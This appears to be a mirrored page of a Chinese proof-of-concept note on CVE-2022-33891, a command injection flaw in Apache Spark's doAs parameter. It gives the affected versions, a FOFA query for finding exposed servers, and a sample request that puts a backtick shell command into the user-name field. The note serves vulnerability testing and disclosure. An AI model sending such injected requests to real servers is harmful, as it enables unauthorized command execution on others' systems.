admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web服务器漏洞/Apache Spark doAs 远程命令执行漏洞 CVE-2022-33891.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

33 lines
578 B
Markdown
Raw Blame History

# Apache Spark doAs 远程命令执行漏洞 CVE-2022-33891
## 漏洞描述
Apache Spark 支持启动 ACL 来为 Web UI 访问提供身份验证,当 ACL 启动时可以通过构造特殊请求用户名导致 RCE
## 漏洞影响
```
Spark Core - Apache <=3.0.3
3.1.1 <= Spark Core - Apache <=3.1.2
3.2.0 <= Spark Core - Apache <=3.2.1
```
## FOFA
```
app="APACHE-Spark"
```
## 漏洞复现
主页面
![image-20220909104326093](./images/202209091043173.png)
验证POC
```
/jobs/?doAs=`touch /tmp/test.txt`
```
![image-20220909104423065](./images/202209091044113.png)
Reference in New Issue View Git Blame Copy Permalink